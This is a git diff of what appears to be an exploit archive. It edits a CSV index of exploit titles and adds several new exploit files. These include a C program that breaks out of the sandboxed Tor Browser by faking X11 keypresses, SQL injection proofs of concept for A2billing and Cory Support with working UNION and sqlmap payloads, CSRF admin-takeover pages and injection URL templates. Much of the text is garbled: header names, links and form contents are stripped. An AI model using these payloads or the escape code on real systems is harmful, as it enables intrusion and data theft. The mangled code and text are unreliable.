-33498,platforms/multiple/remote/33498.txt,"Varnish 2.0.6 - Terminal Escape Sequence in Logs Command Injection",2010-01-11,evilaliv3,multiple,remote,0
+33498,platforms/multiple/remote/33498.txt,"Varnish 2.0.6 - 'Terminal Escape Sequence in Logs' Command Injection",2010-01-11,evilaliv3,multiple,remote,0
 33499,platforms/multiple/remote/33499.txt,"thttpd 2.24 - HTTP Request Escape Sequence Terminal Command Injection",2010-01-11,evilaliv3,multiple,remote,0
 33500,platforms/multiple/remote/33500.txt,"mini_httpd 1.18 - HTTP Request Escape Sequence Terminal Command Injection",2010-01-11,evilaliv3,multiple,remote,0
 33501,platforms/windows/remote/33501.txt,"Cherokee 0.99.30 - Terminal Escape Sequence in Logs Command Injection",2010-01-11,evilaliv3,windows,remote,0
-33502,platforms/windows/remote/33502.txt,"Yaws 1.55 - Terminal Escape Sequence in Logs Command 
Injection",2010-01-11,evilaliv3,windows,remote,0
-33503,platforms/multiple/remote/33503.txt,"Orion Application Server 2.0.7 - Terminal Escape Sequence in Logs Command Injection",2010-01-11,evilaliv3,multiple,remote,0
+33502,platforms/windows/remote/33502.txt,"Yaws 1.55 - 'Terminal Escape Sequence in Logs' Command Injection",2010-01-11,evilaliv3,windows,remote,0
+33503,platforms/multiple/remote/33503.txt,"Orion Application Server 2.0.7 - 'Terminal Escape Sequence in Logs' Command Injection",2010-01-11,evilaliv3,multiple,remote,0
 33504,platforms/multiple/remote/33504.txt,"BOA Web Server 0.94.x - Terminal Escape Sequence in Logs Command Injection",2010-01-11,evilaliv3,multiple,remote,0
 33521,platforms/multiple/remote/33521.rb,"Symantec Workspace Streaming - Arbitrary File Upload (Metasploit)",2014-05-26,Metasploit,multiple,remote,9855
 33611,platforms/windows/remote/33611.txt,"GeFest Web Home Server 1.0 - Directory Traversal",2010-02-08,Markot,windows,remote,0
@@ -15518,7 +15521,7 @@ id,file,description,date,author,platform,type,port
 39554,platforms/php/remote/39554.rb,"PHP Utility Belt - Remote Code Execution (Metasploit)",2016-03-11,Metasploit,php,remote,80
 39568,platforms/hardware/remote/39568.py,"Cisco UCS Manager 2.1(1b) - Remote Exploit (Shellshock)",2016-03-16,thatchriseckert,hardware,remote,443
 39569,platforms/multiple/remote/39569.py,"OpenSSH 7.2p1 - Authenticated xauth Command Injection",2016-03-16,tintinweb,multiple,remote,22
-39585,platforms/windows/remote/39585.py,"Sysax Multi Server 6.50 - HTTP File Share Overflow (SEH) Remote Code Execution (SEH)",2016-03-21,"Paul Purcell",windows,remote,80
+39585,platforms/windows/remote/39585.py,"Sysax Multi Server 6.50 - HTTP File Share Overflow Remote Code Execution (SEH)",2016-03-21,"Paul Purcell",windows,remote,80
 39596,platforms/hardware/remote/39596.py,"Multiple CCTV-DVR Vendors - Remote Code Execution",2016-03-23,K1P0D,hardware,remote,0
 39599,platforms/windows/remote/39599.txt,"Comodo AntiVirus - Forwards Emulated API Calls to the Real API During Scans",2016-03-23,"Google Security Research",windows,remote,0
 39631,platforms/multiple/remote/39631.txt,"Adobe Flash - Object.unwatch Use-After-Free Exploit",2016-03-29,"Google Security Research",multiple,remote,0
@@ -15577,7 +15580,7 @@ id,file,description,date,author,platform,type,port
 40170,platforms/python/remote/40170.rb,"Centreon 2.5.3 - Web Useralias Command Execution (Metasploit)",2016-07-27,Metasploit,python,remote,80
 40176,platforms/linux/remote/40176.rb,"Barracuda Web App Firewall 8.0.1.008/Load Balancer 5.4.0.004 - Authenticated Remote Command Execution (Metasploit) (3)",2016-07-29,xort,linux,remote,8000
 40177,platforms/linux/remote/40177.rb,"Barracuda Web Application Firewall 8.0.1.008 - Authenticated Remote Command Execution (Metasploit)",2016-07-29,xort,linux,remote,8000
-40178,platforms/windows/remote/40178.py,"Easy File Sharing Web Server 7.2 - (SEH) Overflow (Egghunter)",2016-07-29,ch3rn0byl,windows,remote,80
+40178,platforms/windows/remote/40178.py,"Easy File Sharing Web Server 7.2 - Overflow (Egghunter) (SEH)",2016-07-29,ch3rn0byl,windows,remote,80
 40200,platforms/hardware/remote/40200.txt,"NUUO NVRmini2 / NVRsolo / Crystal Devices / Netgear ReadyNAS Surveillance Application - Multiple Vulnerabilities",2016-08-05,"Pedro Ribeiro",hardware,remote,0
 40201,platforms/linux/remote/40201.txt,"ntop/nbox 2.3 < 2.5 - Multiple Vulnerabilities",2016-08-05,"Javier Marcos",linux,remote,0
 40232,platforms/linux/remote/40232.py,"FreePBX 13/14 - Remote Command Execution / Privilege Escalation",2016-08-12,pgt,linux,remote,0
@@ -15746,7 +15749,7 @@ id,file,description,date,author,platform,type,port
 42026,platforms/xml/remote/42026.py,"Oracle PeopleSoft - XML External Entity to SYSTEM Remote Code Execution",2017-05-17,"Ambionics Security",xml,remote,0
 42031,platforms/win_x86-64/remote/42031.py,"Microsoft Windows Windows 7/2008 R2 (x64) - 'EternalBlue' SMB Remote Code Execution (MS17-010)",2017-05-17,sleepya,win_x86-64,remote,445
 42083,platforms/windows/remote/42083.rb,"Octopus Deploy - Authenticated Code Execution (Metasploit)",2017-05-29,Metasploit,windows,remote,0
-42084,platforms/linux/remote/42084.rb,"Samba - 'is_known_pipename()' Arbitrary Module Load (Metasploit)",2017-05-29,Metasploit,linux,remote,0
+42084,platforms/linux/remote/42084.rb,"Samba 3.5.0 < 4.4.14/4.5.10/4.6.4 - 'is_known_pipename()' Arbitrary Module Load (Metasploit)",2017-05-29,Metasploit,linux,remote,0
 42041,platforms/windows/remote/42041.txt,"Secure Auditor 3.0 - Directory Traversal",2017-05-20,hyp3rlinx,windows,remote,0
 42057,platforms/windows/remote/42057.rb,"VX Search Enterprise 9.5.12 - GET Buffer Overflow (Metasploit)",2017-05-23,Metasploit,windows,remote,0
 42060,platforms/linux/remote/42060.py,"Samba 3.5.0 - Remote Code Execution",2017-05-24,steelo,linux,remote,0
@@ -21920,7 +21923,7 @@ id,file,description,date,author,platform,type,port
 9105,platforms/php/webapps/9105.txt,"MyMsg 1.0.3 - 'uid' SQL Injection",2009-07-10,Monster-Dz,php,webapps,0
 9107,platforms/php/webapps/9107.txt,"Phenotype CMS 2.8 - 'login.php user' Blind SQL Injection",2009-07-10,"Khashayar Fereidani",php,webapps,0
 9109,platforms/php/webapps/9109.txt,"ToyLog 0.1 - SQL Injection / Remote Code Execution",2009-07-10,darkjoker,php,webapps,0
-9110,platforms/php/webapps/9110.txt,"WordPress Core & MU & Plugins - Privileges Unchecked in 'admin.php' / Multiple Information Disclosures",2009-07-10,"Core Security",php,webapps,0
+9110,platforms/php/webapps/9110.txt,"WordPress Core & MU & Plugins - 'admin.php' Privileges Unchecked / Multiple Information Disclosures",2009-07-10,"Core Security",php,webapps,0
 9111,platforms/php/webapps/9111.txt,"Jobbr 2.2.7 - Multiple SQL Injections",2009-07-10,Moudi,php,webapps,0
 9112,platforms/php/webapps/9112.txt,"Joomla! Component com_propertylab - (auction_id) SQL Injection",2009-07-10,"Chip d3 bi0s",php,webapps,0
 9115,platforms/php/webapps/9115.txt,"Digitaldesign CMS 0.1 - Remote Database Disclosure",2009-07-10,darkjoker,php,webapps,0
@@ -22417,7 +22420,7 @@ id,file,description,date,author,platform,type,port
 10290,platforms/php/webapps/10290.txt,"Theeta CMS - Multiple Vulnerabilities",2009-12-03,c0dy,php,webapps,0
 10291,platforms/php/webapps/10291.txt,"Joomla! Component ProofReader 1.0 RC6 - Cross-Site Scripting",2009-12-01,MustLive,php,webapps,0
 10292,platforms/multiple/webapps/10292.txt,"Apache Tomcat 3.2.1 - 404 Error Page Cross-Site Scripting",2009-12-01,MustLive,multiple,webapps,0
-10293,platforms/php/webapps/10293.txt,"PHP-Nuke 8.0 - Cross-Site Scripting / HTML Code Injection in News Module",2009-11-27,K053,php,webapps,0
+10293,platforms/php/webapps/10293.txt,"PHP-Nuke 8.0 - ' News Module Cross-Site Scripting / HTML Code Injection",2009-11-27,K053,php,webapps,0
 10294,platforms/php/webapps/10294.txt,"OSI Codes PHP Live! Support 3.1 - Remote File Inclusion",2009-11-24,"Don Tukulesto",php,webapps,0
 10297,platforms/php/webapps/10297.php,"Vivid Ads Shopping Cart - (prodid) SQL Injection",2009-12-03,"Yakir Wizman",php,webapps,0
 10299,platforms/php/webapps/10299.txt,"GeN3 forum 1.3 - SQL Injection",2009-12-04,"Dr.0rYX AND Cr3W-DZ",php,webapps,0
@@ -26013,7 +26016,7 @@ id,file,description,date,author,platform,type,port
 18815,platforms/php/webapps/18815.txt,"STRATO NewsLetter Manager - Directory Traversal",2012-05-01,"Zero X",php,webapps,0
 18820,platforms/php/webapps/18820.php,"OpenConf 4.11 - 'author/edit.php' Blind SQL Injection",2012-05-02,EgiX,php,webapps,0
 18824,platforms/cgi/webapps/18824.txt,"Websense Triton - Multiple Vulnerabilities",2012-05-02,"Ben Williams",cgi,webapps,0
-18822,platforms/php/webapps/18822.txt,"PHP-decoda - Cross-Site Scripting In Video Tag",2012-05-02,"RedTeam Pentesting",php,webapps,0
+18822,platforms/php/webapps/18822.txt,"PHP-decoda - 'Video Tag' Cross-Site Scripting",2012-05-02,"RedTeam Pentesting",php,webapps,0
 18827,platforms/php/webapps/18827.txt,"Baby Gekko CMS 1.1.5c - Multiple Persistent Cross-Site Scripting Vulnerabilities",2012-05-03,LiquidWorm,php,webapps,0
 18828,platforms/php/webapps/18828.txt,"PluXml 5.1.5 - Local File Inclusion",2012-05-03,"High-Tech Bridge SA",php,webapps,0
 18832,platforms/php/webapps/18832.txt,"Symantec Web Gateway - Cross-Site Scripting",2012-05-04,B00y@,php,webapps,0
@@ -37329,8 +37332,8 @@ id,file,description,date,author,platform,type,port
 40106,platforms/windows/webapps/40106.txt,"GSX Analyzer 10.12/11 - 'main.swf' Hard-Coded Superadmin Credentials",2016-07-13,ndevnull,windows,webapps,0
 40109,platforms/xml/webapps/40109.txt,"Apache Archiva 1.3.9 - Multiple Cross-Site Request Forgery Vulnerabilities",2016-07-13,"Julien Ahrens",xml,webapps,0
 40112,platforms/cgi/webapps/40112.txt,"Clear Voyager Hotspot IMW-C910W - Arbitrary File Disclosure",2016-07-15,Damaster,cgi,webapps,80
-40114,platforms/php/webapps/40114.py,"vBulletin 4.x/5.x - Authenticated Persistent Cross-Site Scripting in AdminCP/ApiLog via xmlrpc API",2014-10-12,tintinweb,php,webapps,0
-40115,platforms/php/webapps/40115.py,"vBulletin 4.x - Authenticated SQL Injection in breadcrumbs via xmlrpc API",2014-10-12,tintinweb,php,webapps,0
+40114,platforms/php/webapps/40114.py,"vBulletin 4.x/5.x - AdminCP/ApiLog via xmlrpc API Authenticated Persistent Cross-Site Scripting",2014-10-12,tintinweb,php,webapps,0
+40115,platforms/php/webapps/40115.py,"vBulletin 4.x - breadcrumbs via xmlrpc API Authenticated SQL Injection",2014-10-12,tintinweb,php,webapps,0
 40193,platforms/php/webapps/40193.txt,"Open Upload 0.4.2 - Cross-Site Request Forgery (Add Admin)",2016-08-02,"Vinesh Redkar",php,webapps,80
 40171,platforms/linux/webapps/40171.txt,"AXIS Multiple Products - 'devtools ' Authenticated Remote Command Execution",2016-07-29,Orwelllabs,linux,webapps,80
 40126,platforms/php/webapps/40126.txt,"NewsP Free News Script 1.4.7 - User Credentials Disclosure",2016-07-19,"Meisam Monsef",php,webapps,80
@@ -38062,6 +38065,7 @@ id,file,description,date,author,platform,type,port
 42547,platforms/hardware/webapps/42547.py,"Wireless Repeater BE126 - Local File Inclusion",2017-08-23,"Hay Mizrachi",hardware,webapps,0
 42545,platforms/php/webapps/42545.txt,"Matrimonial Script - SQL Injection",2017-08-22,"Ihsan Sencan",php,webapps,0
 42453,platforms/windows/webapps/42453.txt,"Quali CloudShell 7.1.0.6508 (Patch 6) - Persistent Cross-Site Scripting",2017-08-14,"Benjamin Lee",windows,webapps,0
+42621,platforms/php/webapps/42621.html,"Advertiz PHP Script 0.2 - Cross-Site Request Forgery (Update Admin)",2017-09-06,"Ihsan Sencan",php,webapps,0
 42544,platforms/java/webapps/42544.py,"Automated Logic WebCTRL 6.5 - Unrestricted File Upload / Remote Code Execution",2017-08-22,LiquidWorm,java,webapps,0
 41899,platforms/multiple/webapps/41899.html,"Apple WebKit / Safari 10.0.2(12602.3.12.0.1) - 'PrototypeMap::createEmptyStructure' Universal Cross-Site Scripting",2017-04-20,"Google Security Research",multiple,webapps,0
 41716,platforms/php/webapps/41716.txt,"Gr8 Tutorial Script - SQL Injection",2017-03-24,"Ihsan Sencan",php,webapps,0
@@ -38194,7 +38198,7 @@ id,file,description,date,author,platform,type,port
 42065,platforms/multiple/webapps/42065.html,"WebKit - 'ContainerNode::parserRemoveChild' Universal Cross-Site Scripting",2017-05-25,"Google Security Research",multiple,webapps,0
 42066,platforms/multiple/webapps/42066.txt,"WebKit - 'ContainerNode::parserInsertBefore' Universal Cross-Site Scripting",2017-05-25,"Google Security Research",multiple,webapps,0
 42067,platforms/multiple/webapps/42067.html,"WebKit - enqueuePageshowEvent and enqueuePopstateEvent Universal Cross-Site Scripting",2017-05-25,"Google Security Research",multiple,webapps,0
-42068,platforms/multiple/webapps/42068.html,"WebKit - Stealing Variables via Page Navigation in 'FrameLoader::clear'",2017-05-25,"Google Security Research",multiple,webapps,0
+42068,platforms/multiple/webapps/42068.html,"WebKit - 'FrameLoader::clear' Stealing Variables via Page Navigation",2017-05-25,"Google Security Research",multiple,webapps,0
 42069,platforms/multiple/webapps/42069.html,"Apple Safari 10.0.3(12602.4.8) / WebKit - 'HTMLObjectElement::updateWidget' Universal Cross-Site Scripting",2017-05-25,"Google Security Research",multiple,webapps,0
 42074,platforms/hardware/webapps/42074.txt,"D-Link DCS Series Cameras - Insecure Crossdomain",2017-02-22,SlidingWindow,hardware,webapps,0
 42075,platforms/hardware/webapps/42075.txt,"QWR-1104 Wireless-N Router - Cross-Site Scripting",2017-05-26,"Touhid M.Shaikh",hardware,webapps,0
@@ -38390,13 +38394,17 @@ id,file,description,date,author,platform,type,port
 42596,platforms/php/webapps/42596.txt,"Joomla! Component Huge-IT Video Gallery 1.0.9 - SQL Injection",2017-08-31,"Larry W. Cashdollar",php,webapps,0
 42597,platforms/php/webapps/42597.txt,"Joomla! Component Huge-IT Portfolio Gallery Plugin 1.0.6 - SQL Injection",2017-08-31,"Larry W. Cashdollar",php,webapps,0
 42598,platforms/php/webapps/42598.txt,"Joomla! Component Huge-IT Portfolio Gallery Plugin 1.0.7 - SQL Injection",2017-08-31,"Larry W. Cashdollar",php,webapps,0
-42603,platforms/php/webapps/42603.txt,"FineCMS 1.0 - Multiple Vulnerabilities",2017-08-29,sohaip-hackerDZ,php,webapps,0
+42603,platforms/php/webapps/42603.txt,"FineCMS 1.0 - Multiple Vulnerabilities",2017-08-29,sohaip-hackerDZ,php,webapps,0
 42606,platforms/php/webapps/42606.txt,"Joomla! Component Survey Force Deluxe 3.2.4 - 'invite' Parameter SQL Injection",2017-09-03,"Ihsan Sencan",php,webapps,0
 42607,platforms/php/webapps/42607.txt,"Joomla! Component CheckList 1.1.0 - SQL Injection",2017-09-03,"Ihsan Sencan",php,webapps,0
 42608,platforms/hardware/webapps/42608.txt,"Wireless Repeater BE126 - Remote Code Execution",2017-09-04,"Hay Mizrachi",hardware,webapps,0
 42610,platforms/multiple/webapps/42610.txt,"CodeMeter 6.50 - Cross-Site Scripting",2017-09-04,Vulnerability-Lab,multiple,webapps,0
 42613,platforms/multiple/webapps/42613.txt,"Symantec Messaging Gateway < 10.6.3-267 - Cross-Site Request Forgery",2017-08-09,"Dhiraj Mishra",multiple,webapps,0
+42615,platforms/php/webapps/42615.txt,"A2billing 2.x - SQL Injection",2017-09-05,0x4148,php,webapps,0
 42616,platforms/php/webapps/42616.txt,"A2billing 2.x - Backup File Download / Remote Code Execution",2017-09-04,0x4148,php,webapps,0
 42617,platforms/php/webapps/42617.txt,"iGreeting Cards 1.0 - SQL Injection",2017-09-04,"Ihsan Sencan",php,webapps,0
 42618,platforms/php/webapps/42618.txt,"WordPress Plugin Participants Database < 1.7.5.10 - Cross-Site Scripting",2017-09-01,"Benjamin 
Lim",php,webapps,0
 42619,platforms/php/webapps/42619.txt,"The Car Project 1.0 - SQL Injection",2017-09-05,"Ihsan Sencan",php,webapps,0
+42620,platforms/php/webapps/42620.txt,"Cory Support - 'pr' Parameter SQL Injection",2017-09-06,v3n0m,php,webapps,0
+42622,platforms/php/webapps/42622.html,"Pay Banner Text Link Ad 1.0.6.1 - Cross-Site Request Forgery (Update Admin)",2017-09-06,"Ihsan Sencan",php,webapps,0
+42623,platforms/php/webapps/42623.txt,"Pay Banner Text Link Ad 1.0.6.1 - SQL Injection",2017-09-06,"Ihsan Sencan",php,webapps,0
diff --git a/platforms/linux/local/42626.c b/platforms/linux/local/42626.c
new file mode 100755
index 000000000..c11f5b3b0
--- /dev/null
+++ b/platforms/linux/local/42626.c
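Review bot: The 42603 pair in this hunk removes and re-adds a row whose visible text is byte-for-byte the same, so the actual change is in invisible characters (trailing whitespace, a CRLF/LF line ending or a stray control byte); if that is deliberate it deserves a word in the commit message, otherwise it is noise that makes the description edits in this commit harder to audit. A `git diff --ignore-space-at-eol` (or `cat -A` on the row) would confirm which it is before merging.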
@@ -0,0 +1,94 @@ +/* +Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1293&desc=2 + +**EDIT: I mixed up two different sandboxes; see the comment below for a correction.** + +From inside the Linux sandbox described in +, it is +still possible to talk to the X server without any restrictions. +This means that a compromised browser can e.g. use the +XTEST X protocol extension +() to +fake arbitrary keyboard and mouse events, directed at arbitrary +windows. This permits a sandbox breakout, e.g. by injecting keypresses +into a background window. + + +mentions that the X server is reachable, but it sounds like the author +didn't realize that a normal connection to the X server permits +sandbox breakouts by design. + +To reproduce: + +Install Debian Jessie with the Xfce4 desktop environment and with +backports enabled. +Install bubblewrap and xdotool. +Install the sandboxed Tor browser from +. +Launch the sandboxed Tor browser, use the default configuration. When +the browser has launched, close it. +Delete ~/.local/share/sandboxed-tor-browser/tor-browser/Browser/firefox. 
+Store the following as ~/.local/share/sandboxed-tor-browser/tor-browser/Browser/firefox.c: + +========================= +*/ +#include +#include + +int main(void){ + int status; + setenv("LD_LIBRARY_PATH", "/home/amnesia/sandboxed-tor-browser/tor-browser", 1); + if (fork() == 0) { + execl("/home/amnesia/sandboxed-tor-browser/tor-browser/xdotool", "xdotool", "key", "alt+F2", "sleep", "1", "type", "xfce4-terminal", NULL); + perror("fail"); + return 0; + } + wait(&status); + if (fork() == 0) { + execl("/home/amnesia/sandboxed-tor-browser/tor-browser/xdotool", "xdotool", "sleep", "1", "key", "Return", "sleep", "1", "type", "id", NULL); + perror("fail"); + return 0; + } + wait(&status); + if (fork() == 0) { + execl("/home/amnesia/sandboxed-tor-browser/tor-browser/xdotool", "xdotool", "sleep", "1", "key", "Return", NULL); + perror("fail"); + return 0; + } + wait(&status); + while (1) sleep(1000); + return 0; +} + +/* +========================= + +In ~/.local/share/sandboxed-tor-browser/tor-browser/Browser, run +"gcc -static -o firefox firefox.c". +Run "cp /usr/bin/xdotool /usr/lib/x86_64-linux-gnu/* ~/.local/share/sandboxed-tor-browser/tor-browser/". +Now run the launcher for the sandboxed browser again. Inside the +sandbox, the new firefox binary will connect to the X11 server and +send fake keypresses to open a terminal outside the sandbox and type +into it. + +There are probably similar issues with pulseaudio when it's enabled; +I suspect that it's possible to e.g. use the pulseaudio socket to load +pulseaudio modules with arbitrary parameters, which would e.g. permit +leaking parts of files outside the sandbox by using them as +authentication cookie files for modules that implement audio streaming +over the network. + + +################################################################### + +I mixed up two sandboxes. + +The blog post talks about the Firefox content process sandbox, which is still in development and unrelated to the Tor-specific sandbox I looked at. 
So the "content sandboxing" the blog post talks about isn't very effective yet; the Mozilla wiki points to multiple bug lists that document the remaining work (https://wiki.mozilla.org/Security/Sandbox#Bug_Lists). + +The sandbox I looked at here is written and distributed by the Tor Project. + + +https://gitweb.torproject.org/tor-browser/sandboxed-tor-browser.git/commit/?id=1bfbd7cc1cd60c9468f2e33a3d4816973f1fb2f5 was added to mitigate the issue I reported by filtering X11 traffic and whitelisting permitted X protocol extensions. + +More warnings have been added to the corresponding documentation (https://trac.torproject.org/projects/tor/wiki/doc/TorBrowser/Sandbox/Linux?action=diff&version=23&old_version=21) that point out that this sandbox should not be used without manually configuring nested X11 and that pulseaudio is unsafe. +*/ \ No newline at end of file diff --git a/platforms/linux/remote/10.c b/platforms/multiple/remote/10.c similarity index 100% rename from platforms/linux/remote/10.c rename to platforms/multiple/remote/10.c diff --git a/platforms/php/webapps/42615.txt b/platforms/php/webapps/42615.txt new file mode 100755 index 000000000..40d05e755 --- /dev/null +++ b/platforms/php/webapps/42615.txt 
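Review bot: The two `#include` lines above main() carry no header names in this rendering, so the file as shown would not compile; presumably the angle-bracketed names were lost together with the other `<...>` text in this hunk, and the same loss empties the sandbox, XTEST and Tor Browser references in the prose, which are the security-relevant pointers of the report. Those should be restored before the file is indexed. Separately, `fork()` is only compared with 0, so a -1 return falls through to `wait(&status)`, and `status` is filled three times but never inspected; a comment such as `/* status is collected but never checked: each step runs regardless of the previous one's outcome */` would make that explicit for anyone reproducing the report.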
@@ -0,0 +1,45 @@ +# Title : A2billing 2.x , Sql injection vulnerability +# Vulnerable software : A2billing 2.x +# Author : Ahmed sultan (0x4148) +# Email : 0x4148@gmail.com +# Linkedin : https://www.linkedin.com/in/0x4148/ + +If you're looking for deep technical stuff , overcoming sanitization/hardening . . etc you can check out the full writeup at https://0x4148.com/2016/10/28/a2billing-all-versions-2-1-1-sql-injection-exploit/ + +A2billing is vulnerable to sql injection attack resulting from not enough sanitization of several inputs including transactionID +The sanitization proccess differ from version to another , but the concept is the same , +I demonstrated bypassing the last version (2.1.1) , but still all versions till the moment are vulnerable as well with just little bit different modifications + +File : agent/public/checkout_process.php +getpost_ifset(array('transactionID', 'sess_id', 'key', 'mc_currency', +'currency', 'md5sig', 'merchant_id', 'mb_amount', 'status', 'mb_currency', +'transaction_id', 'mc_fee', 'card_number')); +................................................... +// Status - New 0 ; Proceed 1 ; In Process 2 +$QUERY = "SELECT id, agent_id, amount, vat, paymentmethod, cc_owner, +cc_number, cc_expires, creationdate, status, cvv, credit_card_type, +currency " . +" FROM cc_epayment_log_agent " . +" WHERE id = ".$transactionID." 
AND (status = 0 OR (status = 2 AND +$NOW_2MIN))"; +$transaction_data = $paymentTable->SQLExec ($DBHandle_max, $QUERY); + + +POC : +Sending POST request : transactionID=456789111111 unise//**lectonselinse//**rtect 1,2,3,4,0x706c75676e706179,6,7,8,9,10,11,12,13-//**--&sess_id=4148key=636902c6ed0db5780eb613d126e95268 +to : https://HOST/a2billing/agent/Public/checkout_process.php +will result in redirection of the application and the Location header will contain our decoded payment module which was used in the query "plugnpay" , which indicate successful injection + +Full exploitation demo : https://www.youtube.com/watch?v=8dfdZCmPGWA + + +Exploit timeline : +01/10/2016 : vulnerability reported to vendor +06/10/2016 - 12/2016 : talks talks talks with promises of fixing ASAP +04/09/2017 : Public release + +Full exploit code is attached + +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/42615.zip + +Thanks fly to R1z clan :) \ No newline at end of file diff --git a/platforms/php/webapps/42620.txt b/platforms/php/webapps/42620.txt new file mode 100755 index 000000000..d7ce73a64 --- /dev/null +++ b/platforms/php/webapps/42620.txt 
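Review bot: The quoted vulnerable line `" WHERE id = ".$transactionID." ` shows the root cause — the value collected by `getpost_ifset(...)` is concatenated straight into the SELECT — but the advisory never says what a fix looks like, and the timeline stops at the public release without stating whether a fixed version exists. Readers triaging this entry would want a sentence after the timeline such as `Mitigation: validate transactionID as an integer (or bind it as a prepared-statement parameter) before it reaches the query.` and, if known, the vendor's fix status.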
@@ -0,0 +1,38 @@ +# Exploit : Cory Support (pr) SQL Injection Vulnerability +# Author : v3n0m +# Contact : v3n0m[at]outlook[dot]com +# Date : September, 06-2017 GMT +7:00 Jakarta, Indonesia +# Developer : Cory App +# Software : Cory Support +# App Link : http://coryapp.com/?product&index +# Demo : http://coryapp.com/demo/support/ +# Tested On : Mac OS Sierra v10.12.6 +# Credits : YOGYACARDERLINK, Dhea Dayanaya Fathin Karima, Don't Touch Me (Line Group) & Muhammad Panji, Alfath Dirk, Cafe BMW & YOU !! + +1. Description + +An attacker can exploit this vulnerability to read from the database. +The parameter 'pr' is vulnerable. + + +2. Proof of Concept + +http://domain.tld/[path]/listfaq.php?pr=9999+and+1=2+union+all+select+null,version()-- + +# Exploitation via SQLMap + +Parameter: pr (GET) + Type: boolean-based blind + Title: AND boolean-based blind - WHERE or HAVING clause + Payload: pr=1 AND 4809=4809 + Vector: AND [INFERENCE] + + Type: UNION query + Title: Generic UNION query (NULL) - 2 columns + Payload: pr=1 UNION ALL SELECT NULL,CONCAT(0x7170706271,0x564f724b4475754c4c7a48714c59464c6c43704a636c6f72444471767a79716a6b6d4d6a72654b76,0x7170626b71)-- RNyi + Vector: UNION ALL SELECT NULL,[QUERY][GENERIC_SQL_COMMENT] + + +3. Security Risk + +The security risk of the remote sql-injection web vulnerability in the Cory Support is estimated as high. \ No newline at end of file diff --git a/platforms/php/webapps/42621.html b/platforms/php/webapps/42621.html new file mode 100755 index 000000000..ecb4ad4e6 --- /dev/null +++ b/platforms/php/webapps/42621.html 
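Review bot: The header has no affected-version field — `# Software : Cory Support` names the product and `# Tested On : Mac OS Sierra v10.12.6` describes the tester's client OS, not which releases of the PHP application carry the flaw — so the files.csv entry ends up as `Cory Support - 'pr' Parameter SQL Injection` with no version, which is exactly what a defender needs to decide whether they are affected. A `# Version :` line (or `# Version : unknown` if the author did not record it) belongs in the header block. The description could also name the sink instead of only the parameter: `The 'pr' parameter of listfaq.php reaches a database query without validation; an integer cast or a bound parameter removes the issue.`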
@@ -0,0 +1,30 @@ +# # # # # +# Exploit Title: Advertiz PHP Script 0.2 - Cross-Site Request Forgery (Update Admin User&Pass) +# Dork: N/A +# Date: 06.09.2017 +# Vendor Homepage: http://www.dijiteol.com/ +# Software Link: http://www.dijiteol.com/p-Advertiz-PHP-Script--No-Accounts-Required--i-2.html +# Demo: http://dijiteol.com/demos/advertiz/ +# Version: 0.2 +# Category: Webapps +# Tested on: WiN7_x64/KaLiLinuX_x64 +# CVE: N/A +# # # # # +# Exploit Author: Ihsan Sencan +# Author Web: http://ihsan.net +# Author Social: @ihsansencan +# # # # # +# +# Proof of Concept: + + +
+ + + + + +
+ + +# # # # # \ No newline at end of file diff --git a/platforms/php/webapps/42622.html b/platforms/php/webapps/42622.html new file mode 100755 index 000000000..e5c5daf3e --- /dev/null +++ b/platforms/php/webapps/42622.html @@ -0,0 +1,30 @@ +# # # # # +# Exploit Title: Pay Banner Text Link Ad 1.0.6.1 - Cross-Site Request Forgery (Update Admin User&Pass) +# Dork: N/A +# Date: 06.09.2017 +# Vendor Homepage: http://www.dijiteol.com/ +# Software Link: http://www.dijiteol.com/p-Pay-Banner-Textlink-Ad-Pay-Banner-Advertisement-PHP-Script-i-1.html +# Demo: http://dijiteol.com/demos/pbtla +# Version: 1.0.6.1 +# Category: Webapps +# Tested on: WiN7_x64/KaLiLinuX_x64 +# CVE: N/A +# # # # # +# Exploit Author: Ihsan Sencan +# Author Web: http://ihsan.net +# Author Social: @ihsansencan +# # # # # +# +# Proof of Concept: + + +
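Review bot: Everything after `# Proof of Concept:` renders as empty `+` lines, so the request the PoC submits — its target endpoint and the fields it updates — cannot be reviewed from this hunk; the same holds for platforms/php/webapps/42622.html. Presumably an HTML form was stripped with the other `<...>` text in this rendering. The header gives no endpoint either, so a line such as `# Vulnerable endpoint: [PATH]/<admin update page, from the form's action attribute>` would let a reader assess the issue without reconstructing the form. A `# Fix:` line noting that a per-session anti-CSRF token checked on the update request closes this class of issue would round out the header.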
+ + + + + +
+ + +# # # # # \ No newline at end of file diff --git a/platforms/php/webapps/42623.txt b/platforms/php/webapps/42623.txt new file mode 100755 index 000000000..d3c83a162 --- /dev/null +++ b/platforms/php/webapps/42623.txt @@ -0,0 +1,28 @@ +# # # # # +# Exploit Title: Pay Banner Text Link Ad 1.0.6.1 - SQL Injection +# Dork: N/A +# Date: 06.09.2017 +# Vendor Homepage: http://www.dijiteol.com/ +# Software Link: http://www.dijiteol.com/p-Pay-Banner-Textlink-Ad-Pay-Banner-Advertisement-PHP-Script-i-1.html +# Demo: http://dijiteol.com/demos/pbtla +# Version: 1.0.6.1 +# Category: Webapps +# Tested on: WiN7_x64/KaLiLinuX_x64 +# CVE: N/A +# # # # # +# Exploit Author: Ihsan Sencan +# Exploit Author: Ihsan Sencan +# Author Web: http://ihsan.net +# Author Social: @ihsansencan +# # # # # +# Description: +# The vulnerability allows an users to inject sql commands.... +# +# Proof of Concept: +# +# http://localhost/[PATH]/index.php?action=stats&id=[SQL] +# +# http://localhost/[PATH]/index.php?action=previewad&id=[SQL] +# +# Etc.. +# # # # # \ No newline at end of file diff --git a/platforms/unix/remote/22356.c b/platforms/unix/remote/22356.c index 56d40f270..27b006f88 100755 --- a/platforms/unix/remote/22356.c +++ b/platforms/unix/remote/22356.c @@ -1,7 +1,8 @@ /* source: http://www.securityfocus.com/bid/7106/info -Samba is prone to a buffer-overflow vulnerability when the 'smbd' service tries to reassemble specially crafted SMB/CIFS packets. +Samba is prone to a buffer-overflow vulnerability when the ' +' service tries to reassemble specially crafted SMB/CIFS packets. An attacker can exploit this vulnerability by creating a specially formatted SMB/CIFS packet and sending it to a vulnerable Samba server. The overflow condition will be triggered and will cause smbd to overwrite sensitive areas of memory with attacker-supplied values. diff --git a/platforms/windows/local/42624.py b/platforms/windows/local/42624.py new file mode 100755 index 000000000..dba99c3cc --- /dev/null 
